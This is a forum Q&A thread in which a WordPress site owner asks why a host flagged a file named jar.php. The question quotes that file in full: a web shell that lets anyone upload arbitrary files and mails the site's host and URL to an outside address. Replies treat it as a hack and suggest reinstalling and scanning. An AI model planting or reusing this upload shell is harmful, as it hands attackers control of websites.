# Got mail from hostgator saying "your account has some malicious files hosted" I dont know why?

Tags: wordpress, plugins, web-development-server

Yesterday i got mail from hostgator saying you have hosted some malicious file and file name is jar.php it is situated in wp-admin/images/jar.php this path

I dont know it's because of some plugin or CMS

```
Jar.php file contain below code

<html>
<title>Up</title>
<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' value='upload' name='upload'>
</form>
<?php if(isset($_POST['upload'])) { if(@copy($_FILES['idx_file'] 
 ['tmp_name'], $_FILES['idx_file']['name'])) { echo$_FILES['idx_file'] 
 ['name']. '[<b>OK</b>]'; } else { echo$_FILES['idx_file']['name']. 
'[<b>FAILED</b>'; } }
?>
<?php
$ip = getenv("REMOTE_ADDR");
$subj98 = " Tuy |$ip";
$email = "asku@yax.com";
$from = "From: Result<Tuyul";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "$m22 $b75 $a45";
mail($email, $subj98, $msg8873, $from);
?>
```

I don't understand what is malicious about it, 
Any help would be greatly appreciated.

Thank you in advance

Comment: This code seems to allow to send mail to "asku@yax.com". Is it your email? Are you the writer of this code? Otherwise your word-press was probably hacked or you installed a malicious plugin (which is the same).

Comment: No its not my mail, how to know its bcz of plugin or how do i sort it out ?? thanks

Comment: If you are not comfortable with this kind of problem, you probably should contact a professional, you can first contact hostgator. An other way is to reconstruct your website from a fresh word-press install, but be careful when you install plugins from unknown sources and keep your word-press install up-to-date to protect it to be hacked again.

Answer (score 1):

It could be a hacking attack on your site.

```
  Install this https://wordpress.org/plugins/wordfence/
```

plugin and scan your source. It is a free plugin and it will show you the list of files which are affected by virus code.